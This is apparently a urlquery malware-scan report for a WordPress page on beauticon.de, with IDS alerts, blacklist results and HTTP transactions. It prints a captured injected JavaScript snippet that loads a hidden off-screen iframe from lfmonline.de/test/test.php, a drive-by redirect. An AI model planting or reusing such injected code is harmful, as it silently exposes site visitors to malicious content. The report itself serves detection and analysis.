Overview

URL: beauticon.de/WordPress/?page_id=952
IP: 213.160.71.78
ASN: AS12574 http.net Internet GmbH
Location: Germany
Report completed: 2018-10-11 22:26:20 CEST
urlquery Alerts:
  - Malicious redirection script
  - Redirected URL from malicious script
  - Suspicious javascript obfuscation


Settings

UserAgent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Pool
Access Level


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp  Severity  Source IP  Destination IP  Alert
2018-10-11 22:25:46 CEST  2  213.160.71.78  Client IP  ET INFO Obfuscated Split String (Double Q) 11


Blacklists

MDL  No alerts detected
OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter  No alerts detected
DNS-BH  No alerts detected
mnemonic secure dns  No alerts detected


Recent reports on same IP/ASN/Domain

Last 10 reports on IP: 213.160.71.78

Date  UQ / IDS / BL  URL  IP
2018-11-13 14:34:08 +0100  5 - 2 - 1  beauticon.de/  213.160.71.78
2018-10-13 13:42:11 +0200  5 - 1 - 0  beauticon.de/WordPress/?cat=62  213.160.71.78
2018-10-11 14:34:02 +0200  5 - 1 - 0  beauticon.de/WordPress/?page_id=577  213.160.71.78
2018-10-11 11:51:09 +0200  5 - 0 - 0  beauticon.de/WordPress/?m=201201  213.160.71.78
2018-10-10 07:01:33 +0200  5 - 1 - 0  beauticon.de/WordPress/?cat=60  213.160.71.78
2018-05-22 11:43:46 +0200  5 - 2 - 2  beauticon.de/  213.160.71.78
2018-05-03 20:38:16 +0200  5 - 1 - 1  beauticon.de/WordPress/?page_id=577  213.160.71.78
2018-01-05 01:01:47 +0100  0 - 0 - 1  www.amp-rock.de/amp_header.swf  213.160.71.78
2017-11-26 15:20:28 +0100  5 - 2 - 2  beauticon.de/  213.160.71.78
2017-11-08 09:36:44 +0100  5 - 0 - 2  beauticon.de/  213.160.71.78

Last 10 reports on ASN: AS12574 http.net Internet GmbH

Date  UQ / IDS / BL  URL  IP
2018-12-08 10:38:15 +0100  0 - 0 - 1  herrentor.de/delphi/schichtbuch.exe  213.160.71.70
2018-12-08 10:37:32 +0100  0 - 1 - 1  herrentor.de/delphi/massentraegheitsmomente.exe  213.160.71.70
2018-12-07 22:13:32 +0100  0 - 0 - 1  trendesigner.de/index.php/impressum  213.160.71.82
2018-12-07 20:40:44 +0100  0 - 0 - 1  trendesigner.de/index.php/impressum  213.160.71.82
2018-12-01 15:17:04 +0100  0 - 0 - 1  trendesigner.de/index.php/referenzen  213.160.71.82
2018-11-27 22:44:44 +0100  0 - 0 - 1  trendesigner.de/index.php  213.160.71.82
2018-11-25 13:44:35 +0100  0 - 0 - 1  trendesigner.de/index.php  213.160.71.82
2018-11-25 11:27:42 +0000  0 - 0 - 1  trendesigner.de/index.php/2-uncategorised/5-home  213.160.71.82
2018-11-24 17:18:30 +0100  0 - 0 - 1  trendesigner.de/index.php/2-uncategorised/5-home  213.160.71.82
2018-11-13 14:34:08 +0100  5 - 2 - 1  beauticon.de/  213.160.71.78

Last 10 reports on domain: beauticon.de

Date  UQ / IDS / BL  URL  IP
2018-11-13 14:34:08 +0100  5 - 2 - 1  beauticon.de/  213.160.71.78
2018-10-13 13:42:11 +0200  5 - 1 - 0  beauticon.de/WordPress/?cat=62  213.160.71.78
2018-10-11 14:34:02 +0200  5 - 1 - 0  beauticon.de/WordPress/?page_id=577  213.160.71.78
2018-10-11 11:51:09 +0200  5 - 0 - 0  beauticon.de/WordPress/?m=201201  213.160.71.78
2018-10-10 07:01:33 +0200  5 - 1 - 0  beauticon.de/WordPress/?cat=60  213.160.71.78
2018-05-22 11:43:46 +0200  5 - 2 - 2  beauticon.de/  213.160.71.78
2018-05-03 20:38:16 +0200  5 - 1 - 1  beauticon.de/WordPress/?page_id=577  213.160.71.78
2017-11-26 15:20:28 +0100  5 - 2 - 2  beauticon.de/  213.160.71.78
2017-11-08 09:36:44 +0100  5 - 0 - 2  beauticon.de/  213.160.71.78
2017-10-23 11:54:52 +0200  5 - 2 - 2  beauticon.de/  213.160.71.78


JavaScript

Executed Scripts (1)


Executed Evals (51)

#1 JavaScript::Eval (size: 588, repeated: 1) - SHA256: 6c74f87a47443ce3d2ac1e87c5dac96c5ce5536c3d2f3288b48b53d5817314f4

                                        		if (document.getElementsByTagName('body')[0]) {
		    iframer();
		} else {
		    document.write("<iframe src='http://lfmonline.de/test/test.php' width='100' height='100' style='width:100px;height:100px;position:absolute;left:-10000px;top:0;'></iframe>");
		}

		function iframer() {
		    var f = document.createElement('iframe');
		    f.setAttribute('src', 'http://lfmonline.de/test/test.php');
		    f.style.left = '-10000px';
		    f.style.top = '0';
		    f.style.position = 'absolute';
		    f.style.top = '0';
		    f.setAttribute('width', '100');
		    f.setAttribute('height', '100');
		    document.getElementsByTagName('body')[0].appendChild(f);
		}
                                    


Executed Writes (0)



HTTP Transactions (12)


Request Response
                                        
                                            GET /WordPress/?page_id=952 HTTP/1.1 
Host: beauticon.de
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         213.160.71.78
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Thu, 11 Oct 2018 20:25:46 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Server: Apache/2.4.33 (Unix)
X-Pingback: http://beauticon.de/WordPress/xmlrpc.php
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   6239
Md5:    3be3e7773e53be1c6b3de124d46a495e
Sha1:   ef9a59eefbc596ca5f79359271cd7513f312351b
Sha256: 3c7c661c5c9d783c458c74e5be00fe5c844755ccadf24d35ee9b0662b4fd5121

Alerts:
  urlquery:
    - Suspicious javascript obfuscation
  IDS:
    - ET INFO Obfuscated Split String (Double Q) 11
                                        
                                            GET /WordPress/wp-content/themes/natural-essence/style.css HTTP/1.1 
Host: beauticon.de
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://beauticon.de/WordPress/?page_id=952

                                         
                                         213.160.71.78
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 11 Oct 2018 20:25:46 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Server: Apache/2.4.33 (Unix)
Last-Modified: Mon, 25 Feb 2008 21:09:34 GMT
Etag: W/"17e6-44701fd1e3f80"
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   1961
Md5:    e9aa9faf2b583e8de79cade385551e45
Sha1:   cb2cb330b16125421ee0bc4f682ea897f40000e0
Sha256: 82bef573fdc70b82e35dc9c82d09dbbccb56e843baec0213576c0c4ffb53d5b5
                                        
                                            GET /WordPress/wp-content/themes/natural-essence/img/bg.jpg HTTP/1.1 
Host: beauticon.de
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://beauticon.de/WordPress/wp-content/themes/natural-essence/style.css

                                         
                                         213.160.71.78
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 11 Oct 2018 20:25:46 GMT
Content-Length: 8082
Connection: keep-alive
Server: Apache/2.4.33 (Unix)
Last-Modified: Wed, 20 Feb 2008 12:53:01 GMT
Etag: "1f92-44696781c4540"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.02
Size:   8082
Md5:    71e1925b135c2a25af7a433f50f85a9e
Sha1:   a23fb02f6b099285dd65618bf5a06ed0eaf54e59
Sha256: 929a3e97318c848170ee400fd32df853518d4ec87a869cf5af1d23f8dba3c3ab
                                        
                                            GET /WordPress/wp-content/themes/natural-essence/img/wrapper.gif HTTP/1.1 
Host: beauticon.de
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://beauticon.de/WordPress/wp-content/themes/natural-essence/style.css

                                         
                                         213.160.71.78
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Date: Thu, 11 Oct 2018 20:25:46 GMT
Content-Length: 282
Connection: keep-alive
Server: Apache/2.4.33 (Unix)
Last-Modified: Wed, 20 Feb 2008 12:54:04 GMT
Etag: "11a-446967bdd9300"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 762 x 10
Size:   282
Md5:    d1b621f85a033e2161cbbfef1411a6bb
Sha1:   dd82774b9a27f217b10784b05974ad805dab1ed9
Sha256: 77ae6522eb8aa138639ce856ec9c91fd0249a598d0eb3d7097481abb94989ef7
                                        
                                            GET /WordPress/wp-content/themes/natural-essence/img/nav.gif HTTP/1.1 
Host: beauticon.de
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://beauticon.de/WordPress/wp-content/themes/natural-essence/style.css

                                         
                                         213.160.71.78
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Date: Thu, 11 Oct 2018 20:25:46 GMT
Content-Length: 1501
Connection: keep-alive
Server: Apache/2.4.33 (Unix)
Last-Modified: Wed, 20 Feb 2008 12:53:45 GMT
Etag: "5dd-446967abba840"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 10 x 82
Size:   1501
Md5:    e705f1d831a86fc38d1b47618ea4846a
Sha1:   6f4318dc6ea5d1f4607a5e77ba29dafca125ea71
Sha256: 3aceb6fd9d2f2c20b41d948953583bb7ab5948bac1087a096dd38e871630f49c
                                        
                                            GET /WordPress/wp-content/themes/natural-essence/img/main.gif HTTP/1.1 
Host: beauticon.de
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://beauticon.de/WordPress/wp-content/themes/natural-essence/style.css

                                         
                                         213.160.71.78
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Date: Thu, 11 Oct 2018 20:25:46 GMT
Content-Length: 98
Connection: keep-alive
Server: Apache/2.4.33 (Unix)
Last-Modified: Wed, 20 Feb 2008 12:53:32 GMT
Etag: "62-4469679f54b00"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 495 x 5
Size:   98
Md5:    c1357fa5e459b3d9082cd2908ebe40f7
Sha1:   90b3aef1ebdfccb371b9d237b3ff54685c92bae1
Sha256: 2ef7d25e7cd77ddd044e05db18afe33977476ed93fe4051e6e197cec88bb2182
                                        
                                            GET /WordPress/wp-content/themes/natural-essence/img/header.jpg HTTP/1.1 
Host: beauticon.de
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://beauticon.de/WordPress/wp-content/themes/natural-essence/style.css

                                         
                                         213.160.71.78
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 11 Oct 2018 20:25:46 GMT
Content-Length: 16787
Connection: keep-alive
Server: Apache/2.4.33 (Unix)
Last-Modified: Wed, 20 Feb 2008 14:01:22 GMT
Etag: "4193-446976c8c9080"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.02
Size:   16787
Md5:    f61e38af3f2efa810d1deca5165cee4a
Sha1:   440ff3e194f39ba07f7871872ccb8b0312fe5818
Sha256: 3aa58efd5936b00364fdc49b762e931ea8344a431022c1448c24676e43db0c0e
                                        
                                            GET /WordPress/wp-content/themes/natural-essence/img/bottom.gif HTTP/1.1 
Host: beauticon.de
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://beauticon.de/WordPress/wp-content/themes/natural-essence/style.css

                                         
                                         213.160.71.78
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Date: Thu, 11 Oct 2018 20:25:46 GMT
Content-Length: 223
Connection: keep-alive
Server: Apache/2.4.33 (Unix)
Last-Modified: Wed, 20 Feb 2008 12:53:10 GMT
Etag: "df-4469678a59980"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 750 x 9
Size:   223
Md5:    32e6c4672baefacf1af3630a635cdd60
Sha1:   e32686ec113833c9deaa199740925beac1f96a2a
Sha256: cc1acb20f9e18486d08e66ef8733cb115a1bd0a62704cc41769767aa1cc9a5c7
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: beauticon.de
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         213.160.71.78
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
                                        
Date: Thu, 11 Oct 2018 20:25:49 GMT
Content-Length: 209
Connection: keep-alive
Server: Apache/2.4.33 (Unix)


--- Additional Info ---
Magic:  HTML document text\012 exported SGML document text
Size:   209
Md5:    18ffb59b61525f781cf9251045be575d
Sha1:   bd7318b00b15b7a1c8a48524419fa2e5c27a5b6d
Sha256: b6682cab65d3243b5b75efb7279dbf49491957484780f2ba0a87632cc0e25642
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: beauticon.de
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         213.160.71.78
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
                                        
Date: Thu, 11 Oct 2018 20:25:52 GMT
Content-Length: 209
Connection: keep-alive
Server: Apache/2.4.33 (Unix)


--- Additional Info ---
Magic:  HTML document text\012 exported SGML document text
Size:   209
Md5:    18ffb59b61525f781cf9251045be575d
Sha1:   bd7318b00b15b7a1c8a48524419fa2e5c27a5b6d
Sha256: b6682cab65d3243b5b75efb7279dbf49491957484780f2ba0a87632cc0e25642
                                        
                                            GET /test/test.php HTTP/1.1 
Host: lfmonline.de
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://beauticon.de/WordPress/?page_id=952

                                         
                                         0.0.0.0
                                        


--- Additional Info ---

Alerts:
  urlquery:
    - Redirected URL from malicious script
                                        
                                            GET /test/test.php HTTP/1.1 
Host: lfmonline.de
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://beauticon.de/WordPress/?page_id=952

                                         
                                         0.0.0.0
                                        


--- Additional Info ---

Alerts:
  urlquery:
    - Redirected URL from malicious script